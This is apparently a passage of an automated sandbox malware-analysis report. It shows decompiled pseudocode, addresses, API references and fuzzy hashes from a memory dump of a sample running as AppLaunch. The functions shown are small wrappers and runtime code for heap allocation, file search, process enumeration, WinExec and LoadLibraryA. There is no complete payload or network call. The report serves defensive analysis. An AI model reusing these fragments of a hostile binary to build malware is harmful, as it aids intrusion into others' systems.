					E0041C9D0(_v20, _v16,  *_t10 + 1); // executed
				}
				 *((intOrPtr*)(_v12 + 0x10)) = 0;
				 *((intOrPtr*)(_v12 + 0x14)) = 0xf;
				_v5 = 0;
				return E0041AAF0(0 + _v12,  &_v5);
			}

0x0041a1f6
0x0041a1fc
0x0041a20e
0x0041a215
0x0041a220
0x0041a226
0x0041a227
0x0041a22c
0x0041a232
0x0041a240
0x0041a240
0x0041a248
0x0041a252
0x0041a259
0x0041a278

APIs

allocator.LIBCONCRTD ref: 0041A240

Part of subcall function 0041C9D0: _Deallocate.LIBCONCRTD ref: 0041C9DF

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: Deallocateallocator
String ID:
API String ID: 2557898104-0
Opcode ID: 7c88040d8c86ed044f639e1e1fcbda2ad488b297b2e13a949f462eafe0ae0115
Instruction ID: 1027d2e255a14e596fbe535577baa46d1f3ccc680def8c5c712c2560c61684c0
Opcode Fuzzy Hash: 7c88040d8c86ed044f639e1e1fcbda2ad488b297b2e13a949f462eafe0ae0115
Instruction Fuzzy Hash: 681144B4D00108AFCB04EF95D891AEEBB75BF88304F0041ADD405AB382DB35AA85CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0042D840 Relevance: 1.5, APIs: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0042D840(void* __edx, intOrPtr _a4) {
				char _v8;
				char _v12;
				char _v16;
				WCHAR* _v20;
				char _v24;
				char _v28;
				char _t16;
				signed int _t17;
				void* _t21;
				signed int _t26;
				signed int _t27;

				if(_a4 != 0) {
					_push(_t26);
					_v28 = 0;
					_v24 = 0;
					_v20 = 0;
					_v16 = 0;
					_v12 = 0;
					_v8 = 0;
					_t16 = E0042D76C(_t21, _a4,  &_v28, E0042D789(__edx, __eflags));
					__eflags = _t16;
					if(_t16 == 0) {
						_t17 = E004332D0(_v20); // executed
						_t27 = _t17;
					} else {
						_t27 = _t26 | 0xffffffff;
					}
					__eflags = _v8;
					if(_v8 != 0) {
						E00432BD6(_v20);
					}
					return _t27;
				} else {
					return E004332D0(0);
				}
			}

0x0042d84c
0x0042d85a
0x0042d85b
0x0042d85e
0x0042d861
0x0042d864
0x0042d867
0x0042d86a
0x0042d87a
0x0042d882
0x0042d884
0x0042d88e
0x0042d894
0x0042d886
0x0042d886
0x0042d886
0x0042d896
0x0042d89a
0x0042d89f
0x0042d8a4
0x0042d8a9
0x0042d84e
0x0042d857
0x0042d857

APIs

_free.LIBCMT ref: 0042D89F

Part of subcall function 004332D0: CreateDirectoryW.KERNELBASE(0042D893,00000000,?,0042D893,?), ref: 004332DA
Part of subcall function 004332D0: GetLastError.KERNEL32(?,0042D893,?), ref: 004332E4
Part of subcall function 004332D0: __dosmaperr.LIBCMT ref: 004332EB

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: CreateDirectoryErrorLast__dosmaperr_free
String ID:
API String ID: 1564823083-0
Opcode ID: 3ea248443bc1410430ac72e322d8a8a076eda73df0eeaf947010e5df93b312d3
Instruction ID: 861c00e7638fd66d9b10c77b6a59664fc33c3099ff06162d75cd35277909f416
Opcode Fuzzy Hash: 3ea248443bc1410430ac72e322d8a8a076eda73df0eeaf947010e5df93b312d3
Instruction Fuzzy Hash: 5A018671E00168AECF10BFA9AC057DE7FF4AB44354F50417BE424F22D1E6788A44D799

Uniqueness

Uniqueness Score: -1.00%

Function 00436150 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00436150(signed int _a4, signed int _a8) {
				void* _t8;
				signed int _t13;
				signed int _t18;
				long _t19;

				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x4c7798, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E00431923();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E00429369(__eflags))) = 0xc;
							__eflags = 0;
							return 0;
						}
						__eflags = E00430ECD(__eflags, _t19);
						if(__eflags == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}

0x00436156
0x0043615b
0x00436169
0x00436169
0x0043616f
0x00436171
0x00436171
0x00436188
0x00436191
0x00436199
0x00000000
0x00000000
0x00436179
0x0043617b
0x0043619d
0x004361a2
0x004361a8
0x00000000
0x004361a8
0x00436184
0x00436186
0x00000000
0x00000000
0x00436186
0x00000000
0x00436188
0x00436161
0x00436167
0x00000000
0x00000000
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004324A2,00000001,00000364,00000006,000000FF,?,0042976E,0042936E,00432BFC,?,?,00431C11), ref: 00436191

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 0ff9b95c3b72be5360e3e9a4aff863fa24b7a6899741743b343ad5621cafaa9b
Instruction ID: 04bcf9848fd7c47ae2b5e57c8a00529a88839ff2ecc2e891c6332841aeb93ef4
Opcode Fuzzy Hash: 0ff9b95c3b72be5360e3e9a4aff863fa24b7a6899741743b343ad5621cafaa9b
Instruction Fuzzy Hash: EFF0B43160562677DF215F66EC01B5B3798AF497A0F16E127AC0896296CA68EC0186EC

Uniqueness

Uniqueness Score: -1.00%

Function 004248C2 Relevance: 1.5, APIs: 1, Instructions: 38
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 59%

			E004248C2(void* __eflags, intOrPtr _a4) {
				intOrPtr _v16;
				char _v20;
				intOrPtr _v28;
				void* _t11;
				void* _t12;
				void* _t17;
				char* _t23;
				void* _t26;
				void* _t27;
				void* _t29;

				while(1) {
					_push(_a4);
					_t11 = E0042940C(); // executed
					if(_t11 != 0) {
						break;
					}
					_t12 = E00430ECD(__eflags, _a4);
					__eflags = _t12;
					if(_t12 == 0) {
						__eflags = _a4 - 0xffffffff;
						if(_a4 != 0xffffffff) {
							_push(_t26);
							_t26 = _t29;
							_t29 = _t29 - 0xc;
							E0042474E( &_v20);
							E0042750C( &_v20, 0x44a044);
							asm("int3");
						}
						_push(_t26);
						_t27 = _t29;
						_t23 =  &_v20;
						E004161D0(_t23);
						E0042750C( &_v20, 0x449fd0);
						asm("int3");
						_push(_t27);
						_push(_t23);
						_v28 = 0;
						_t17 = E00432BD6(_v16); // executed
						return _t17;
					} else {
						continue;
					}
					L10:
				}
				return _t11;
				goto L10;
			}

0x004248d4
0x004248d4
0x004248d7
0x004248df
0x00000000
0x00000000
0x004248ca
0x004248d0
0x004248d2
0x004248e3
0x004248e7
0x00424dad
0x00424dae
0x00424db0
0x00424db6
0x00424dc4
0x00424dc9
0x00424dc9
0x00424dca
0x00424dcb
0x00424dd0
0x00424dd3
0x00424de1
0x00424de6
0x00431961
0x00431964
0x00431968
0x00431972
0x00431979
0x00000000
0x00000000
0x00000000
0x00000000
0x004248d2
0x004248e2
0x00000000

APIs

stdext::threads::lock_error::lock_error.LIBCPMTD ref: 00424DD3

Part of subcall function 0042750C: RaiseException.KERNEL32(E06D7363,00000001,00000003,00419EFC,?,?,?,?,00419EFC,?,00449FD0,?,?,00409BEF), ref: 0042756C

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: ExceptionRaisestdext::threads::lock_error::lock_error
String ID:
API String ID: 3447279179-0
Opcode ID: 31bd470498f51ea385cb41e39ca77f51d30d5245668891f99270b843befd6b59
Instruction ID: f6eb2ed98617e5aa3e7f30e916243435575d324f09dc0f88bec72ccf5535b9a0
Opcode Fuzzy Hash: 31bd470498f51ea385cb41e39ca77f51d30d5245668891f99270b843befd6b59
Instruction Fuzzy Hash: 2DF0B434A0422DB6CF04BAB5FC0699E732C9D44318FA0463BB924954D2EB7CEA5AC59D

Uniqueness

Uniqueness Score: -1.00%

Function 00407220 Relevance: 1.5, APIs: 1, Instructions: 36
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 37%

			E00407220(void* __ebx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __ebp;
				intOrPtr _t16;
				void* _t23;

				_t23 = __ebx;
				_v12 = _a4 + 0x23;
				_t24 = _v12;
				if(_v12 <= _a4) {
					E00419EE0();
				}
				_t26 = _v12;
				_t16 = E004184D0(_v12); // executed
				_v8 = _t16;
				do {
					if(_v8 == 0) {
						do {
							E0042929F(_t23, _t24, _t26, __eflags);
							__eflags = 0;
						} while (0 != 0);
					} else {
					}
					_t24 = 0;
				} while (0 != 0);
				_v16 = _v8 + 0x00000023 & 0xffffffe0;
				 *((intOrPtr*)(_v16 + 0xfffffffffffffffc)) = _v8;
				return _v16;
			}

0x00407220
0x0040722c
0x0040722f
0x00407235
0x00407237
0x00407237
0x0040723c
0x00407240
0x00407248
0x0040724b
0x0040724f
0x00407253
0x00407253
0x00407258
0x00407258
0x00000000
0x00407251
0x0040725c
0x0040725c
0x00407269
0x0040727a
0x00407283

APIs

Concurrency::cancel_current_task.LIBCPMTD ref: 00407237

Part of subcall function 00419EE0: stdext::threads::lock_error::lock_error.LIBCPMTD ref: 00419EE9

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: Concurrency::cancel_current_taskstdext::threads::lock_error::lock_error
String ID:
API String ID: 2103942186-0
Opcode ID: 05c64ed778e5bfccc98d8df64dc75e9c2e2830421ae9b732d8aa1b547df28530
Instruction ID: 78e599120a76d619af26ab79d19177af5b6f758e28b04c3efc457aa0b7fff89e
Opcode Fuzzy Hash: 05c64ed778e5bfccc98d8df64dc75e9c2e2830421ae9b732d8aa1b547df28530
Instruction Fuzzy Hash: 35F0E674D05108ABCB04EFA8D58169EB7B1EF54348F1081EEE405A7385E634AE91DB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00432552 Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00432552(long _a4) {
				void* _t4;
				long _t8;

				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00429369(__eflags))) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x4c7798, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00431923();
					if(__eflags == 0) {
						goto L7;
					}
					__eflags = E00430ECD(__eflags, _t8);
					if(__eflags == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x00432558
0x0043255e
0x00432590
0x00432595
0x0043259b
0x00000000
0x0043259b
0x00432562
0x00432564
0x00432564
0x0043257b
0x00432584
0x0043258c
0x00000000
0x00000000
0x0043256c
0x0043256e
0x00000000
0x00000000
0x00432577
0x00432579
0x00000000
0x00000000
0x00432579
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,?,?,004248DC,00000000,?,004184DC,00000000,?,00407209,00000000), ref: 00432584

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 732649e28f1a427c2e4507567df99aa50b6afe1c7c2c5fd1e6782824479fe56f
Instruction ID: ad2f5f6f4504a711c853a92d5759eb8421a945b4db9558f56e00bc7bcb099942
Opcode Fuzzy Hash: 732649e28f1a427c2e4507567df99aa50b6afe1c7c2c5fd1e6782824479fe56f
Instruction Fuzzy Hash: 44E0223264623177E6206766AE20B5F3688DF4D3B0F052123EC08D22D0EBACDF0181ED

Uniqueness

Uniqueness Score: -1.00%

Function 004066F0 Relevance: 1.5, APIs: 1, Instructions: 26
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004066F0(intOrPtr __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				struct _WIN32_FIND_DATAA* _v8;
				void* _v12;
				intOrPtr _v16;
				intOrPtr _v20;

				_v20 = __ecx;
				_v16 = E0040E2E0(__eflags);
				_v8 =  *((intOrPtr*)(E004075F0(_a8)));
				_v12 =  *((intOrPtr*)(E004075F0(_a4)));
				return FindNextFileA(_v12, _v8);
			}

0x004066f6
0x004066fe
0x0040670f
0x00406720
0x00406731

APIs

FindNextFileA.KERNELBASE(?,?), ref: 0040672B

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: FileFindNext
String ID:
API String ID: 2029273394-0
Opcode ID: e8d8aaa7adf672db2d94c8baec5a6f6267447337c98efdb230412774eea2fd91
Instruction ID: 83ac03c15b083370be727aed03fa35d8a52bd3a5d39fc836b9eb3bf0580645f2
Opcode Fuzzy Hash: e8d8aaa7adf672db2d94c8baec5a6f6267447337c98efdb230412774eea2fd91
Instruction Fuzzy Hash: DCF0C0B9D04208BFCB04EFE5D84189EBB78EF48304F1085AEF919A7341E635AA10DB95

Uniqueness

Uniqueness Score: -1.00%

Function 00406740 Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406740(intOrPtr __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				struct tagPROCESSENTRY32W _v8;
				void* _v12;
				intOrPtr _v16;
				intOrPtr _v20;

				_v20 = __ecx;
				_v16 = E0040E3B0(__eflags);
				_v8 =  *((intOrPtr*)(E004075F0(_a8)));
				_v12 =  *((intOrPtr*)(E004075F0(_a4)));
				return Process32First(_v12, _v8);
			}

0x00406746
0x0040674e
0x0040675f
0x00406770
0x00406781

APIs

Process32First.KERNEL32(00000002,00000000,?,?,?,?,00000002,00000000), ref: 0040677B

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: FirstProcess32
String ID:
API String ID: 2623510744-0
Opcode ID: 50464b99b480eeebe16d228fcc0b76da9e415b81aa8edefa988c7147e788d79d
Instruction ID: 256e17f9a3ea42181f4ff8ec40e02256bc1ef1c23efa7cb0cffc227e97a4389b
Opcode Fuzzy Hash: 50464b99b480eeebe16d228fcc0b76da9e415b81aa8edefa988c7147e788d79d
Instruction Fuzzy Hash: BCF0C0B9D04208BFCB04EFA5D84189EBB74EF48304F1085AEF919A7341E635AA10DB95

Uniqueness

Uniqueness Score: -1.00%

Function 00406DD0 Relevance: 1.5, APIs: 1, Instructions: 26
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406DD0(intOrPtr __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				int _v8;
				CHAR* _v12;
				intOrPtr _v16;
				intOrPtr _v20;

				_v20 = __ecx;
				_v16 = E0040EBD0(__eflags);
				_v8 =  *((intOrPtr*)(E004075F0(_a8)));
				_v12 =  *((intOrPtr*)(E004075F0(_a4)));
				return WinExec(_v12, _v8);
			}

0x00406dd6
0x00406dde
0x00406def
0x00406e00
0x00406e11

APIs

WinExec.KERNEL32(?,?), ref: 00406E0B

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: Exec
String ID:
API String ID: 459137531-0
Opcode ID: 7592d547c3d9d09edef8d76084c4acc23b5765e6c04ca6e10bd2169341ac92b7
Instruction ID: c59a3b825ae257478a4d392cf29b96688063c4fdadacbc1a5df1dd25bdce0306
Opcode Fuzzy Hash: 7592d547c3d9d09edef8d76084c4acc23b5765e6c04ca6e10bd2169341ac92b7
Instruction Fuzzy Hash: 50F0C0B9D04208BFCB04EFA5D84189EBB75EF58304F1085AEF919A7341E635EA10DB95

Uniqueness

Uniqueness Score: -1.00%

Function 00406E20 Relevance: 1.5, APIs: 1, Instructions: 26
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406E20(intOrPtr __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				int _v8;
				CHAR* _v12;
				intOrPtr _v16;
				intOrPtr _v20;

				_v20 = __ecx;
				_v16 = E0040ECA0(__eflags);
				_v8 =  *((intOrPtr*)(E004075F0(_a8)));
				_v12 =  *((intOrPtr*)(E004075F0(_a4)));
				return WinExec(_v12, _v8);
			}

0x00406e26
0x00406e2e
0x00406e3f
0x00406e50
0x00406e61

APIs

WinExec.KERNEL32(?,?), ref: 00406E5B

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: Exec
String ID:
API String ID: 459137531-0
Opcode ID: 8e4374c2f9c52111c308c562f5ae33bb3cb6d218b495a6d31319e59699c6c286
Instruction ID: 6df2add0981378f7dee2fb3c4ddc85f4d4f77964032ccc6a2236f77459021c77
Opcode Fuzzy Hash: 8e4374c2f9c52111c308c562f5ae33bb3cb6d218b495a6d31319e59699c6c286
Instruction Fuzzy Hash: 1DF0C0B9D04208BFCB04EFA5D84189EBB74EF48304F1485AEF919A7341E635AA10EB95

Uniqueness

Uniqueness Score: -1.00%

Function 00406460 Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406460(intOrPtr __ecx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;

				_v16 = __ecx;
				_v12 = E0040E070(__eflags);
				_v8 =  *((intOrPtr*)(E004075F0(_a4)));
				return FindCloseChangeNotification(_v8);
			}

0x00406466
0x0040646e
0x0040647f
0x0040648c

APIs

FindCloseChangeNotification.KERNELBASE(00000000,?,00000002,00000080,00000000), ref: 00406486

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: e9d445555839f47a23f300ca6b7bd9a166425ccd68edd2fad009fc120133a17f
Instruction ID: 668e1dd0d3680479faba32f2d65b6b9ed832f8954cf25996deb5044780039e67
Opcode Fuzzy Hash: e9d445555839f47a23f300ca6b7bd9a166425ccd68edd2fad009fc120133a17f
Instruction Fuzzy Hash: A4E012B9D0430CBFCB00EFE5D44589EBB78AF48300F1085BEE90567341E635AA10DB95

Uniqueness

Uniqueness Score: -1.00%

Function 004064C0 Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004064C0(intOrPtr __ecx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;

				_v16 = __ecx;
				_v12 = E0040E210(__eflags);
				_v8 =  *((intOrPtr*)(E004075F0(_a4)));
				return FindClose(_v8);
			}

0x004064c6
0x004064ce
0x004064df
0x004064ec

APIs

FindClose.KERNELBASE(?), ref: 004064E6

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 057613da5b63d022cdcea94853dd251cbe314091c4606d04015d06ffb4908621
Instruction ID: 03e70bc2b2b0035be16c0d14baa2d185a8e5ad2353ef570cb94e6fd39eac28b9
Opcode Fuzzy Hash: 057613da5b63d022cdcea94853dd251cbe314091c4606d04015d06ffb4908621
Instruction Fuzzy Hash: E7E0ECB9D04208ABCB00EFE5D44589EBB78AB58300F1085BEE90567341E635AA509B95

Uniqueness

Uniqueness Score: -1.00%

Function 00406A50 Relevance: 1.5, APIs: 1, Instructions: 18
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406A50(intOrPtr __ecx, void* __eflags, intOrPtr _a4) {
				CHAR* _v8;
				intOrPtr _v12;
				intOrPtr _v16;

				_v16 = __ecx;
				_v12 = E0040F0B0(__eflags);
				_v8 =  *((intOrPtr*)(E004075F0(_a4)));
				return LoadLibraryA(_v8);
			}

0x00406a56
0x00406a5e
0x00406a6f
0x00406a7c

APIs

LoadLibraryA.KERNELBASE(?), ref: 00406A76

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: fa159c903c917b2a08f8c9eb06c6723324a1a4fb7d4403cc4fde649281163f55
Instruction ID: a11a19e441b7f9655b5c32c96d56d27ab99328155b3802e9c5056d8a90b3a8a9
Opcode Fuzzy Hash: fa159c903c917b2a08f8c9eb06c6723324a1a4fb7d4403cc4fde649281163f55
Instruction Fuzzy Hash: BFE0ECB9D04208ABCB00EFA5D44589EBB78AB48300F1081BAE90567341EA35AA149B96

Uniqueness

Uniqueness Score: -1.00%

Function 00406CE0 Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406CE0(intOrPtr __ecx, void* __eflags, intOrPtr _a4) {
				struct _MEMORYSTATUSEX* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _t9;

				_v16 = __ecx;
				_v12 = E0040DC60(__eflags);
				_t9 = E004075F0(_a4);
				_v8 =  *_t9;
				GlobalMemoryStatusEx(_v8);
				return _t9;
			}

0x00406ce6
0x00406cee
0x00406cf5
0x00406cff
0x00406d06
0x00406d0c

APIs

GlobalMemoryStatusEx.KERNELBASE(?), ref: 00406D06

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: ded2ddebbeb9bdb13fb8a804a442136d8b43ab05667107ff1196c67ab71d35d3
Instruction ID: 85e29a2ac202d861c9b464a44f0bf6ebf3e9c6b5417c2844ab29824b930d42db
Opcode Fuzzy Hash: ded2ddebbeb9bdb13fb8a804a442136d8b43ab05667107ff1196c67ab71d35d3
Instruction Fuzzy Hash: B1E0ECB9D0420CABCB00EFE5D84589EBB78AB48300F1081BAE90567341E635AA14EB95

Uniqueness

Uniqueness Score: -1.00%

